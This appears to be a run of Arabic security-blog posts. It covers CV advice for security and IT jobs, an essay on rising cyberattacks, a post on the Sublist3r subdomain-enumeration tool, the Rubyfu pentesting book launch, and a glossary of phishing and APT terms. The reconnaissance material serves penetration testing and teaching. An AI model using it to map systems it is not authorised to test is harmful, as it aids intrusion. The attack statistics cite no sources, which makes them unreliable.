Ranked as number 4 in X Bug bounty program for finding critical RCE vulnerability in their website
Won the 3rd place with my team in X CTF (Capture the Flag) competition
etc etc etc

وعلي هذا المنوال يمكنك كتابة نجاحاتك الشخصية بإختلاف مجال عملك فبالتأكيد كل منا له نجاحاته الشخصية 🙂

00000000316.0

٤- مستواك التعليمي (Education)

هذا الجزأ خاص بمستواك التعليمي كمثال أنك تخرجت من جامعة كذا بقسم كذا ويمكنك كتابة سنة التخرج إذا أردت, وحتي إذا لازلت طالب بالجامعة فيمكنك أن توضح ذلك, نفس القسم أيضا يشمل الشهادات التي حصلت عليها من خلال الكورسات التي درستها, واذا لم تحصل علي شهادات فيمكنك كتابة المستوي التعليمي فقط كما يلي:

Education
Bachelor of Computer Science from Cairo University (Egypt)

مثال آخر علي كتابة المستوي التعليمي والشهادات

Education & Certification
Bachelor of Computer Science from Cairo University (Egypt)
Cisco Certified Network Associate (CCNA)
Certified Ethical Hacker (CEH)
Red Hat Certified Engineer (RHCE)

٥- عملك وخبراتك السابقة (Work Experience)

في هذا القسم تقوم بكتابة أسماء الشركات التي عملت بها مسبقا وطبيعة عملك او المسمي الوظيفي الخاص بك في كل شركة ووقت العمل بها, حتي لو كان ذلك العمل عمل حر FreeLance Job او من خلال الإنترنت إلخ فيجب أن تقوم بكتابته أيضا, ويكون ترتيب كتابة الشركات بناء علي الأحدث ثم الأقدم بحسب ترتيب السنوات, وكما يلي عدة أمثلة لتساعدك علي كتابة هذا القسم بإختلاف مجال عملك:

Work Experience

Vodafone, from December 2012 to October 2013 – Network Engineer
My job at Vodafone as a network engineer included managing the company network infrastructure
Administering & designing LANs, WANs internet/intranet, and voice networks
Working with multiple technical platforms i.e. mainframe, two tiered client servers and three tiered client servers
Co-operating with the systems team during the installation/implementation of new appliances inside our data-center etc etc

Security4Arabs, from September 2015 to Present – Security Engineer
My job in Security4Arabs company includes incident handling, network security reviews, Penetration testing and managing security devices such as the Firewall, IDS & IPS, my job role also includes etc etc

Freelance Security Researcher, from May 2014 to June 2015 – Red Team
I’ve been working as a security researcher with different platforms such as Hackerone and BugCrowd, the projects i joined included public and private bug bounty programs and it was mainly focused on Web Applications Vulnerabilities hunting, during that time i was ranked as number 5 in X bug bounty program for finding critical vulnerabilities in their website

SecDown, from October 2013 to March 2014 – System Administrator
I joined SecDown company as a systems engineer managing their linux servers and handling the full servers installation including the physical and virtual servers running Vmware technology, my job role also included Windows servers installation and configuration of active directory

Freelance Developer, from June 2011 to October 2013 – PHP Developer
I’ve been working as a freelance developer in different online platforms such as StackOverFlow, etc, etc, building applications with different technologies such as bootstrap, NodeJS, etc etc and using different frameworks such as CakePHP & Symfony, my job role also included etc etc

٦- مقالاتك وشروحاتك (Publications)

هذا القسم يتضمن بعض المقالات الهامة التي قمت بكتابتها في مواقع معينه او حتي في مدونتك الخاصة او خبر تم كتابته عنك في صحيفة معينه او بحث قمت بعمله او كتاب قمت بتأليفه او محاضرة قمت بإلقائها في مؤتمر في جامعتك او مؤتمر عالمي أو ورقة بحثية قمت بكتابتها إلخ إلخ مع كتابة رابط او صفحه تحتوي علي ما قمت بذكره حتي يمكن الإطلاع عليه, مثال علي ذلك :

Publications
Write-up, How to develop web application in NodeJS from Zero to Hero – reference
Speaker at Cairo Security Camp conference about xyz – reference
Write-up, How to build a threat intelligence system in your corporate – reference
Contributed to TechnlologyGuru Magazine with 2 articles – reference

الرابط المدرج في كلمة Reference عليك إستبدالة برابط يحتوي علي ما قمت بذكرة حتي يتثني للشركة الرجوع إليها للإطلاع علي محتوي المقالات.

7- المشاريع التي أنجزتها (Projects)

في هذا القسم ستقوم بكتابة المشاريع التي أنجزتها خلال فترة عملك او حتي مشروع التخرج الخاص بك في الجامعة وكذلك المشاريع التي قمت بعملها أثناء فترة عملك الحر إلي آخره, مثال إذا كنت مهندس شبكات:

Projects
Vodafone: I was one of the team who designed the corporate network inside vodafone which included the installation and configration of routers and switches
Saudi Telecom Company (STC): Installed and configured WAN Optimizer across their branches, also worked on the implementation of their new VPN solution

مثال إذا كنت مختبر إختراق

Projects
Isecur1ty: I’ve been a consultant in Isecurity team conducting consultation and penetration testing services for various customers in the middle east
HSBC: Worked on a penetration testing project of HSBC bank internal network and internal web-applications
Zain: Worked on a Security Assessment for Zain newly launched mobile application along with its back-end system

مثال إذا كنت مبرمج

Projects
By2olak: I’ve been part of the team who developed by2olak application, responsible for the development of the backend application to manage users comments & adding more features to the API
Shopping Application: During my graduation project i worked with 4 other colleagues to develop a shopping application in PHP and a Mysql Database as a backend.
Masrawy.com: Developed the search engine of Masrawy.com using ASP.NET and MVC Framework with MSSQL Server database

7- الكورسات (Courses)

كثيرا ما قمت بحضور كورسات بدون إمتحان هذا الكورس للحصول علي شهادته, لذا في هذا القسم تقوم بكتابة أسماء الكورسات التي حضرتها, مثال علي ذلك:

Courses
Ebrahim also attended below courses
Cybrary.it (CYB-3008) – POST Exploitation Technique
Red Hat Certified Technical (RHCT)
SANS (Sec504 – GCIH) – Hackers Techniques, Exploits & Incident Handling

نصائح هامة:

١- لابد أن تكتب السيرة الذاتية الخاصة بك باللغة الإنجليزية

٢- لا يمكن بأي شكل من الأشكال ان تزيد سيرتك الذاتية عن ثلاث صفحات, قم بتصغير الخطوط وحذف المسافات وكتابة العناصر المهمه فقط المهم أن لا يتعدي الـ CV الخاص بك الثلاث صفحات ويفضل أن يكون صفحتين إن أمكن.

٣- جهز لديك بعض جهات التواصل كمرجع للشركة التي تقوم بالتقديم فيها إذا أرادات السؤال عنك فمثلا إذا قمت بعمل مشروع لشركة X فبالتأكيد لديك البريد الإلكتروني لأكثر من شخص داخل الشركة يمكنك إستخدامهم كمرجع Reference لتقييمك وإعطاء رأيهم عنك Feedback حينما تريد ذلك.

٤- السيرة الذاتية قد تسمي CV وقد تسمي Resume والفرق ان ال Resume هو نسخة مختصرة لتعبر عن مهاراتك وأعمالك فقط بينما ال CV يحمل تفاصيل أكثر, لكن لا مشكلة في ذلك يمكنك إعتبارهم نفس الشئ 😀

وإليكم رابط الـ CV التالي في نسخة Word يمكنكم التعديل عليها بحسب وظيفتكم وطبيعة عملكم حتي يكون الموضوع أسهل عليكم إن شاء الله.

https://docs.google.com/document/d/1fvZ5BMVoy3IXue_qulOdJNwdmRibtRmaVdsZRNDuQfY/edit?usp=sharing

وفي نهاية الموضوع أود توجيه الشكر للمهندس حاتم الصفطي والمهندس محمد طاهر علي مساعدتهم أثناء فترة الإعداد لهذا المقال.

إذا كانت هناك نقطه غير واضحه او أردتم المساعدة فقط قم بكتابة تعليق علي هذه التدوينة وسيتم الرد عليكم بالتفصيل ان شاء الله 🙂

عهد جديد من الهجمات الإلكترونية يدفعنا إلى الاهتمام بأمن المعلومات

cyberattacks

أصبحت قضايا أمن المعلومات من الخطورة بالمكان الذي يحتم علينا الاهتمام بكل ما هو جديد فيها،، فبعد توسع التقنيات الحديثة التوسع الذي جعلها تطال معظم مناحي الحياة الأصلية منها و الفرعية، الضرورية منها و الترفيهية، و دخول عالم الانترنت و الأجيال المتلاحقة من التكنولوجيا علي حياتنا اليومية تزداد الحاجة الماسة للاهتمام بجميع الموضوعات التى تخص أمن المعلومات.

لعلنا في السطور القادمة سنقوم بعرض بسيط لخطورة الوضع الحالي،،

في النصف الأخير من القرن العشرين، كان استخدام الكمبيوتر محدود للغاية حيث اقتصر الاستخدام فقط على المنظمات و الهيئات الكبرى كالجامعات و الوزارات و المصانع العملاقة،، و كانت البيانات موجوده بالصورة الورقية بجانب النسخ الإلكترونية ،، وكان تداول الوثائق الورقية هو الأصل فى التعاملات اليومية بينما يقتصر تدخل الكمبيوتر على مجرد توثيق أو حفظ إلكتروني لتلك الوثائق أو البيانات.

في نهايات القرن العشرين بدأت الكمبيوتر يزحف بشكل ملحوظ إلى المدارس و الجامعات، فرأينا معملا للحاسب الألي في كل مدرسة و جامعة مثلا بل و انتشرت الى الجمعيات الأهلية و المصالح الحكومية.

مع نهاية القرن العشرين و بداية القرن الحادي والعشرين ظهر بقوة مفهوم الكمبيوتر الشخصي و كمبيوتر لكل منزل و انتشر المفهوم بصورة سريعة بعد التوسع في توصيل الانترنت و ظهرت مقاهي الانترنت و بدأ تداول مفاهيم جديدة كالمواقع الالكترونية و البريد الالكتروني و هكذا.

على مر السنوات العشرة الأخيرة، اتسعت بشكل صاروخي الدائرة الإلكترونية و الحواسيبية حولنا، فأصبح وجود الانترنت ضروريا و أصبح كل منا يحمل هاتف ذكي و كمبيوتر محمول، بجانب الحاسب الشخصي في المنزل أو العمل هذا إلى جانب الساعة الذكية و التلفزيون الذكي و أنظمة التتبع فى السيارات و الأنظمة الذكية للتحكم في المنزل و جميعها متصلة بالانترنت، و ظهرت و بقوة وسائل التواصل الاجتماعي و التوظيف الإلكتروني و ما إلى أخر ذلك من تطبيقات و استخدامات الانترنت التي يصعب حصرها و نستخدمها بصورة لحظية تقريبا و جميعها متصل بالانترنت.

ليس هذا وحسب، فالمؤسسات و المصانع و المصالح الحكومية و البنوك و المراكز التجارية إلخ، أصبحت تستخدم الكمبيوتر لكل من موظفيها و بشكل رسمي و ضروري و أصبح لكل مؤسسه أو مصلحة موقع و نطاق إلكتروني ،، و أصبحت الأجهزة المعاونة مثل الطابعات و الفاكسات و الهواتف و ماكينات النسخ الورقي كلها متصلة بالانترنت و يمكن التحكم بها أليا وعن بعد.

انتشرت و بشدة أنظمة الأمن الإلكتروني في المصالح الحكومية و المصانع و المراكز التجارية و حتى فى المنازل مثل أنظمة التحكم عن بعد و الأبواب الإلكترونية و التسجيل الفوتوغرافي بالكاميرات و كلها متصلة بالانترنت و يمكن التحكم بها أليا وعن بعد.

تحولت الماكينات في المصانع من مجرد ماكينه مصمته تقوم بمهمه محدده إلى جهاز كمبيوتر متصل بالانترنت و يعمل بنظام تشغيل معين و يقوم بعمل تحديثات دورية للتحكم فى تشغيل ماكينه أو عدة ماكينات.

ومع تزايد هذا العالم الإلكتروني هذه الزيادة شديدة التسارع بموازاة تقدم تقنيات التصنيع الالكتروني،، تتسارع معها و بقوة نوعية و طرق و أساليب الهجمات السيبرالية، بل أن هذا التسارع يسهل و يتيح أساليب جديده و طرق أعنف فى شكلية الهجمات السيبرالية.

فبعد أن كان هناك كمبيوتر واحد فى مكتبة جامعة مثلا يستعمله ما يقرب من 100 طالب يوميا (و نفس المثال بالنسبه لمصلحة حكومية أو شركة أو مصنع) مما يجعل احتمالية الهجوم على شخص بعينه لا تزيد عن 5 % ، ازدادت هذه الاحتمالية الى ما يقرب الــ 99% في وجود الشخص محاطا بدائرة من الأجهزة و التقنيات و التطبيقات الإلكترونية المتصلة بالانترنت.

و بعد أن كان الهاكر او المهاجم يعمل بصورة عامه و طفولية و يرمي إلى زيادة شهرتة في عالم الإختراق أو إظهر قدرتة على تخريب نظام معين، أصبح يعمل بصورة دقيقة و يرمي الى الكسب المادي و ينتقي هدفة بكل عناية و يستمر فى استهدافه و يقوم بجمع أكبر كمية من المعلومات عنه و يحافظ على وجوده داخل أنظمة الهدف و تسريب أكبر كمية من المعلومات الهامة حتى لو تطلب هذا الحفاظ على أنظمة الهدف نفسه وإصلاحها فى بعض الأحيان.

و بعد أن كانت أساليب الهجوم محدوده فى مجموعة من الفيروسات او الملفات الضارة .. إلخ، تعددت أساليب الهجوم و تنوعت و أصبحت كترسانة الأسلحة الفتاكه تحت يد الهاكر او الماجم يقوم باستخدامها أو التهجين بينها.

مع تعدد التقنيات الإلكترونية و شدة الإقبال على استخدامها ظهر مفهوم التحكم المركزي ) ( Centralized Control Systems الذي يجمع بين أكثر من تقنية بداخله،، فمثلا أنظمة الدخول و الخروج في مؤسسة ما تتكامل مع أنظمة المراقبة و التسجيل بالكاميرات ومع الأبواب الإلكترونية ومع أنظمة حساب الرواتب الشهرية و جميعها تخضع لنظام تحكم واحد مركزي ) ( Centralized بحيث يكون أكثر شمولية و سرعة فى التحكم وإعطاء نتائج أفضل،، و لكن اذا تم اختراق نظام التحكم المركزي يتم التحكم بكل هذه التقنيات المربوطه به و يصبح من الصعب جدا منع الهجوم من التسبب فى خسائر وأضرار أكبر!!

مثال أخر،، أصبحت أجهزة التلفزيون تضمن بداخلها دائرة التحكم عن بعد Remote Control ) ( و جهاز التقاط البث من الاقمار الصناعية (Receiver) و دوائر التوصيل اللاسلكي بالانترنت (Wi-Fi) و كمبيوتر مصغر(Embedded Computer) للتحكم بكل هذا بجانب تقنيات أخرى،، فلو فرضنا بحدوث اختراق للاتصال اللاسلكي و يقوم المخترق الأن بتغيير التقاط البث من أقمار صناعة (Satellites Sync) معينة أو يقوم ببث مواد غير مرغوب فيها لن تستطيع حينها فصل الريسيفر أو فصل دائرة الاتصال اللاسلكي لانها اصبحت مدمجة داخل التلفزيون،، نعم أصبح التحكم بالتقنية أسهل و لكن أيضا أصبح اختراق التقنية أكبر خطورة،، و بالفعل هذا قد حدث مع نوعية معينة من أجهزة التلفزيون التي تقدم تقنية الاتصال اللاسلكي و التحكم المركزي.

و كأمثلة على ما سبق سنقوم بعرض بعض الأضرار الواقعية في عشر نقاط ،، تدفعنا و بقوة إلى الإهتمام الشديد بقضايا أمن المعلومات

  1. الخسائر المقدرة جراء الجرائم السيبرالية على مستوى العالم تقدر 100 مليار دولار سنويا و الرقم في تزايد من سنة لأخرى.

  2. هناك أكثر من 1.6 مليار مستخدم لوسائل التواصل الإجتماعي حول العالم، و 64 % من مستخدمي الإنترنت يستخدمونها بصفة لحظية، و تعد وسائل التواصل الإجتماعي من التقنيات المحببة جدا للهاكرز حيث يتم اختراق ما لا يقل عن 600 الف حساب Facebook فقط يوميا .و يعد واحد من كل عشرة مستخدمين لوسائل التواصل الإجتماعي مخترق بالفعل و يتم التلاعب به من قبل المخترقين.

  3. أكثر من 95% من أجهزة الكمبيوتر معرضة لثغرات التطبيقات اللكترونية (Exploit Kits) حيث أنه يكاد لا يخلو جهاز كمبيوتر من تطبيقات مثل Oracle Java, Adobe Reader or Adobe Flash و اكتشاف ثغرات في مثل هذه التطبيقات ينجم عنه أخطار جثيمة.

  4. ما يقرب 59% من الموظفين في المؤسسات يكونون السبب في جرائم سيبرالية على مؤسساتهم سواء عن قصد بتسريب بيانات سرية أو ملكيات حساسة للمؤسسة أو دون قصد مثل أن يقوم المخترق بخداعهم بطريقة ما ليستخدم صلاحياتهم أو بعدم اكتراثهم لموضوعات أمن المعلومات و عدم حفاظهم على تعليمات الأمن المعلوماتي المتبعة في المؤسسة.

  5. من الطرق المحببة أيضا للهاكرز للتلاعب بضحاياهم هي الهندسة الاجتماعة (Social Engineering) و نتيجة لهذا أثبتت الإحصائيات أن أكثر من 1 مليار دولار تم سرقتهم من بنوك فى 30 دولة على مستوى العالم خلال عامين.

  6. الالتزام السيبرالي – Cyber security Compliances – قد يتفاجئ البعض عندما يعلم أن اللتزام بمعايير الأمن المعلوماتي و السيبرالي قد يكون أحد اسباب الهجمات .. فمجرد الالتزام بوجود تقنيات حماية معينة في المؤسسات أو البنوك مثلا ليس كاف بالمرة لتحقيق الحماية – و لكن الواجب ان تكون تلك التقنيات معدة الإعداد الصحيح و يعمل عليها مسؤولين مدربين بعنياة و يتم تحديثها فى الاوقات المحددة ،، و كذلك متابعة تقنيات الهجمات الجديدة للتحقق من كفاية تقنيات الحماية لمواجهتها او الاحتياج لتقنيات جديدة،، و في بعض الأحيان قد تظهر ثغرات خطرة فى أنظمة الحماية نفسها كمثل التى نراها فى الجدران النارية مثل FortiGate مثلا أو برامج الحماية ضد الفيروسات و خلافه.

  7. 68% من من الموارد المالية تذهب للحماية ضد الهجمات السيبرالية و معالجة ما ينجم عنها،، حيث يقدر الوقت المستهلك لتحليل هجوم معين و حصر أخطاره و معالجة أضراره بــ 170 يوما طبقا لبحث أجراه Ponemon Institute .

  8. 178% زيادة فى عدد الهجمات منذ عام 2010 حيث تقدر عدد الهجمات السيبرالية الناجحة اسبوعيا بمتوسط 138 هجمة .

  9. يقدر نسبة 15% تقريبا من مستخدمي الهواتف الذكية قد تعرضوا فعليا لهجمات سيبرالية، و تزيد الاحتمالية بتعرض ما يقرب من 60 % من مستخدمي الهواتف الذكية و اللوحية لهجمات سيبرالية اذا ما لم يقوموا بتزويد أجهزتهم بوسائل حماية مناسبة.

  10. قامت شركة Fiat Chrysler Automobiles بسحب ما يقرب من 1.4 مليون مركبة لتعديل و تغطية ثغرات في نظامها تسمح للمخترقين بالتحكم في بعض خصائصها و ذلك بعد الحادثة الشهيرة باختراق المركبات الالكترونية لشركة JEEP.

المصادر:

 

 

أداة Sublist3r للبحث عن الدومينات الفرعية في محركات البحث

Sublist3r_Logoمن أهم مراحل عملية إختبار الاختراق هي عملية جمع المعلومات عن الهدف , فمختبر الاختراق المحترف هو من يقوم بإجادة هذة المرحلة و يقوم بجمع المعلومات عن الهدف بشكل دقيق حتى يستطيع ان يقوم بإختراقه بعد ذلك بنجاح . و من مراحل جمع المعلومات هي تحديد الدومنيات الفرعية الخاصة بالهدف , مثلا اذا كان الهدف هو إختراق google.com فلابد ان يقوم مختبر الاختراق بالبحث عن جميع ما يخص شركة جوجل و يبحث عن نقاط الضعف بها , فمثلا سوف يقوم بالبحث عن الثغرات في mail.google.com و plus.google.com و translate.google.com و غيرها من خدمات جوجل.

أداة Sublist3r هي أداة صنعت خصيصاً لكي تساعد مختبري الاختراق في البحث عن الدومينات الفرعية الخاصة بالهدف , فهي تساعد مختبري الإختراق و صائدين الثغرات في برامج المكافآت المالية ( BugBounty Programs )  في تحديد و جمع الدومينات الفرعية الخاصة بالهدف من خلال إستخدام محركات البحث مثل Ask, Baidu , Bing, Yahoo , Google و ايضا من خلال خدمة Netfcraft و خدمة DNSdumpster. الأداة تقوم ايضاً بجمع الدومينات الفرعية الخاصة بالهدف من خلال التخمين او الـ BruteForce باستخدام قاموس اوwordlist يحتوي على اغلب أسماء الدومينات الفرعية المشهورة .

الأداة تم برمجتها بلغة Python و هي مفتوحة المصدر تحت رخصة GNU GPL و يستطيع اي شخص ان يقوم بتعديلها و تطوير الكود الخاص بها .

هذة صورة للأداة عند تجربتها على موقع Yahoo.com

Sublist3r

ألإداة تحتاج لتنصيب بعض مكتبات Python  حتى تعمل بشكل سليم و إليكم طريقة تنصيبها على أنظمة لينوكس:

Requests library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-requests
  • لتنصيب المكتبة على Centos او Redhat:
sudo yum install python-requests
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install requests

dnspython library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-dnspython
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install dnspython

argparse library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-argparse
  • لتنصيب المكتبة على Centos او Redhat:
sudo yum install python-argparse
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install argparse

لتحميل الأداة و مزيد من التفاصيل قم بزيارة الرابط التالي:

https://github.com/aboul3la/Sublist3r

انطلاق مشروع كتاب Rubyfu للغة Ruby لمختبري الاختراق

rubyfu

نبذة عن الكتاب

اليوم نعلن رسميا عن انطلاق مشروع الكتاب المفتوح Rubyfu والمختص بالمهارات البرمجية في لغة الـ Ruby لمختبري الاختراق. فكرة الكتاب تختلف عن الكتب الأخرى من حيث عرض المحتوى والفئة المستهدفة وطريقة تطوير الكتاب. هذا الكتاب يستهدف المختصين في الختبار الاختراق (Hackers) بشكل عام والمُلمين بلغة Ruby حيث يضع بين يديك كل ما تحتاجه يوميا من مهارات برمجية لتوفير وقت وجهد البحث عن كيفية عمل سكريبت يقوم بمهمة خاصة بلغة ال Ruby. يتميز الكتاب بقلة الكلام و الدخول في الطبيق مباشرة مع وضع بعض التوضيح إن لزم الأمر. من جانب خبرة, لا يحتاج الهاكر لكتاب 200 صفحة لفهم ماهو الـ Socket لكي يقوم بكتابة سكريبت طوله 20 سطر لينجز عمله. هذا الكتاب يسمح لك بالتركيز على الهدف الذي تريد اختراقه ويوفر لك البداية السريعة لكتابة السكريبت الذي يحقق الهدف. نعم فهذا الكتاب لا يعطيك معلومة بل يعطيك خبرة.

مفتوح المصدر

نعم الكتاب مفتوح المصدر, ويسمح لك بالمشاركة فيه ككاتب أو مشارك في الكتاب والذي بالتبعية سيضيف اسمك إلى قائمة المشاركين الموجودة في أخرالكتاب لحفظ مجهوداتك. هناك طرق عدة للمشاركة:

  • إضافة مواضيع جديدة
  • تحسين الأكواد الحالية أو إضافة طرق أخرى لأكواد موجودة
  • تحسين وترتيب الكتاب
  • اقتراحات و اسئلة
  • الإبلاغ عن أخطاء لغوية أو برمجية
  • نشر الكتاب
  • دعم الكتاب ماديا (يذهب الدعم على تحسين جودة الكتاب)

جاء الكتاب بطابع المشاريع البرمجية أكثر من الطابع المألوف عن إصدار الكتب لكي نضمن اسمرارية تطوير المعلومة, فالكتاب لن يتوقف محتواه على ما ستجده وقت إطلاقه ونشره للعامة.

رخصة الكتاب (CC BY-NC-SA)

بعد بحث واستشارة الكثير من المهتمين بالحقوق الفكرية, وجدنا أن الرخصة Attribution-NonCommercial-ShareAlike CC BY-NC-SA هي الأنسب حيث تسمح للمجميع بالمشاركة وإعادة النشر والتطوير على الكتاب مع حفظ حقوق المشاركين الكتاب, كما أنها تمنع الاستخدام التجاري للكتاب لتفادي أي مشاكل تتعلق بهذا مع أي أحد ولكي لا نظلم القرّاء والمشاكين في الكتاب على حد سواء فالأصل في الكتاب نشر المعرفة وليس التكسب.

أقسام الكتاب

يحتوي الكتاب على 6 وحدات(Modules) تتفرع تحتها المواضيع المتعلقة بها بشكل سهل وبأقل كلام وأكثر تطبيق ممكن.

  • Module 0x0 | Introduction

بداية هادئة للقارئ, الكاتب أو اي شخص أحب أن يطلع على الكتاب بشكل عامل. هنا ستجد بعض التفاصيل عن كفيفة البدء بالمشاركة في الكتاب بك أنواعها.

  • Module 0x1 | Basic Ruby KungFu

تجميعة جميلة وسريعة عن أكثر المهارات المطلوبة في التعامل مع الـ Strings في حياة مخبرين الاختراق و كيفية التلاعب بها. إذا كنت متخصص في مجال اختبار الاختراق فستزور هذا القسم بشكل يومي تقريبا.

  • Module 0x2 | System KungFu

هنا ندخل بشكل أعمق إلى التعامل مع أنظمة التشغيل من الحصول على سطر أوامر على الأنظمة وتشفير البيانات والتلاعب بالملفات وغيرها.

  • Module 0x3 | Network KungFu

هنا كل ما تحتاجه في التعامل مع بروتوكلات الشبكات و التلاعب بها. كما ستتعرف على كيفية بناء/صناعة الحزم بنفسك من البداية وحتى إرسالها إلى كارت الشبكة.

  • Module 0x4 | Web KungFu

هذا القسم يحتوي العديد من الأفكار البرمجية اللتي تحتاجها في اكتشاب و/أو استغلال ثغرات الويب. جزء مرن وشيق ويحتوي على طرق لم يناقشها أحد من قبل.

  • Module 0x5 | Exploitation KungFu

إذا كنت من مكتشفي ثغرات الـ Buffer Overflow  أو كنت من محبي كتابة Modules للميتاسبويت, ستجد هذا القسم مفيد لك جدا.

  • Module 0x6 | Forensic KungFu

حتى وإن كنت مخترِق, تحتاج معرفة كيف يفكرة المحققين كمان أنك قد تحتاج المهارات مهارات برمجية لعمل بعض المهام بعد الاختراق و المشابهة لعمل المحققين الجنائيين ولكن لتصعيد صلاحياتك أو لجمع المعلومات. هنا ستجد بعض المهرات السهلة والتي ستحتاجها عاجلا أم لاحقا.

ماذا عن المبتدئين؟

إذا كنت بتدئ في لغة الروبي فأنصحك بالذهاب إلى جزء المراجع في أخر الكتاب والبدء من هناك لكي تتعلم اللغة كي تستفيد أعلى استفادة من الكتاب وتستطيع أن تتواصل معنا إن احتجت المساعدة. هناك عدد لا نهائي من المصادر للغة الروبي, فلا تتردد في البد ولا تهدر وقتك في المقارنة بين اللغات فهذا لن يجعلك مبرمجا أفضل.

تواصل معنا!

تواصلك معنا يثري المحتوى و يوصلنا إلى أفضل نتائج للكتاب, فالكتاب مصنوع من المجتمع وإلى المجتمع.

طرق التواصل

تستطيع أن تشارك معنا وطرح الأسئلة على المخزن الرسمي في موقع جيت هب Rubyfu issues وسنقوم بالتفاعل معك ويسعدنا مساهمتك معنا في المشروع

شكر وعرفان

كما تعلمنا من عالم المصادر المفتوحة, نحب دائما الإشادة بكل من ساهم ويساهم في تقدم مشروع كتاب Rubyfu . حاولنا بشتى الطرق إيجاد طرق للتعبير عن تقديرنا للمشاركين فاتقفنا على الطرق التالية

  1. وضع إسم المشاركين في قائمة الشرف للمشاركين في الكتاب. تسطيع أن تكون من مشارك إلي كاتب في الكتاب بناء على حجم مشاركاتك وإضافاتك للكتاب.
  2. إرسال قميص يحمل شعار الكتاب و المبدأ القائم عليه هدية إلي باب منزلك. مثال في الصور التالية.

rubyfushirt1 rubyfushirt2

ختاماً

في الختام نحب أن نشكر كل المساهمات المحورية في حياة هذا المشروع منذ بدايته والتي كانت أكثر بكثير من المتوقع والتي كانت بعد الله أحجار أساس النحجاح الذي وصل إليه هذا المشروع حتى اليوم. كمان أننا نشكر كل من سيساهم معنا مستقبلا بشتى الطرق.

 

 

تعريفات هامة بأشهر مصطلحات أمن المعلومات والفرق بينها

السلام عليكم ورحمة الله وبركاته

كثيرا ما يكون لدي البعض إلتباس حول مصطلحات مثل Phishing و Spear Phishing او حول Targeted Attack و APT وغيرها

لذا إن شاء الله في هذه التدوينة سأشرح أهم مصطلحات أمن المعلومات لكي يكون المعني واضح تجاهها.

ملحوظة: تعمدت كتابة المصطلحات باللغة الإنجليزية لأنها لابد أن تحفظ كما هي 🙂

phishing

1- ما الفرق بين Phishing, Vishing, Spear Phishing, Spam؟

Spam: هي رسائل دعائية يتم إرسالها بكميات كبيرة أو إلي عدد كبير من ال Emails بغرض دعائي, مثلا دعايه لبرمجيات معينه او منتجات معينه إلخ.

Phishing: هي رسائل إحتيال إلكتروني يتم إرسالها أيضا إلي كميات كبيرة من ال Emails بشكل عشوائي بغرض سرقة حساباتهم البنكية او بطاقات الإئتمان Credit Cards أو كلمات المرور الخاصة بهم أو طلب من المستخدم أن يفتح ملف معين بغرض إختراق جهازه.

Spear Phishing: هو نفسه ال Phishing ولكن الفرق هنا أن ال Spear Phishing يتم إرساله إلي أهداف معينه ومحدده ويتم إرساله بشكل مدروس وليس عشوائيا, مثال إذا كان أحد المخترقين يستهدف شركة بعينها فإنه يقوم بعملية بحث علي مواقع التواصل مثل LinkedIn وغيرها وينتقي موظفين في وظائف معينة داخل الشركة ويقوم بإنتحال شخصية أحدهم لإرسال رسائل إلي زملائه في الشركة حتي يكسب ثقتهم في فتح ملفات معينه تسمح للمخترق بالتحكم في أجهزتهم او بسرقة كلمات المرور الخاصة بهم.

Vishing: هو نفس فكرة عمل ال Phishing لكنه يتم من خلال الإتصال بهاتف الضحية Voice Phishing حيث يقوم الهاكر بالإتصال بهاتف الضحيه من أي خدمة إتصال من خلال الإنترنت وينتحل صفة البنك او شركة الإتصالات إلخ ويطلب من الضحيه بياناته الشخصية والتي ستساعده فيما بعد في الوصول إلي حسابات الضحية.

apt

2- ما الفرق بين ال Targeted Attack, State Sponsored Attack, APT, Zeroday Attack ؟

Zeroday Attack: (شكرا إبراهيم مسعد علي التعديل)

تطلق كلمة Zeroday علي الثغرات التي تصيب تطبيقات معينة وتكون الثغرة غير منتشرة علي الإنترنت والشركة صاحبة التطبيق المصاب لديها 0 أيام لإصدار ترقيع للثغرة قبل نشرها علي الإنترنت وفي بعض الأحيان حتي الشركة صاحبة التطبيق تظل لشهور أو سنوات لا تعلم عن الثغرة شئ.

it often takes not just days but months and sometimes years before a developer learns of the vulnerability that led to an attack.

مثال: هاكر صيني إكتشف ثغرة في ال Microsoft Office تمكنه من إختراق أي جهاز يستخدم هذا التطبيق بمجرد فتح ملف وورد ينتهي ب .doc او .docx

وبالطبع بما أنها ثغرة ZeroDay فهذا يعني أنه لا يمكن إكتشافها بواسطة برامج ال AntiVirus وليس لها أي سجل او بصمة Hash علي الإنترنت.

نفس المفهوم ينطبق أيضا علي ثغرات تطبيقات الويب مثل WordPress, Joomla وغيرهم وليس فقط ال Client Side Applications مثل Office, flash وغيرها.

APT :APT هي إختصار ل Advanced Persistent Threat وهي تطلق علي المخترقين اللذين يقومون بإستخدام برمجيات متطورة ومتقدمة تسمح لهم بالبقاء داخل شبكات الشركات وأجهزتها لمدة طويلة جدا دون أن يتم إكتشافهم وهؤلاء النوعية من المخترقين غالبا ما يستخدمون ثغرات  من نوعية ال Zeroday لكي يقوموا بعملية الإختراق وزرع ال Backdoors الخاصة بهم داخل أجهزة وشبكات الشركات التي يقومون بإختراقها.

State Sponsored Attack: المخترقين اللذين يطلق عليهم كلمة State Sponsored هم المخترقين اللذين يعملون تحت مظلة الأجهزة الحكومية والإستخباراتية التابعة لبلادهم ويتم دعمهم ماديا وخططيا وعدديا ومعلوماتيا من تلك الجهات الحكومية/الإستخباراتية, وبما أن هؤلاء المخترقين هدفهم دائما هو البقاء داخل شبكات الجهات التي قاموا بإختراقها لأطول فترة فإنهم يطلق عليهم لقب ال APT الذي تم شرحه بالأعلي ودائما ما يستخدمون ثغرات من نوعية Zeroday في إختراقاتهم.

أهداف ال State Sponsored Attackers دائما ما تكون أهداف حكومية, عسكرية, إستخباراتية أو حتي أهداف سياسية.
مثال علي ذلك, فريق المخترقين التابع لوكالة الأمن القومي الأمريكي NSA واللذين تم تلقيبهم ب Equation Group  حيث قاموا بإختراقات لأهداف حكومية وإستخباراتية وعسكرية علي مدي أكثر من عشر سنوات, وكان من ضمن ضحاياهم (بحسب ذكر شركة Kaspersky) الجيش الليبي وشركة الإتصالات اليمنية وأحد شركات الطاقة بالجزائر.

equ

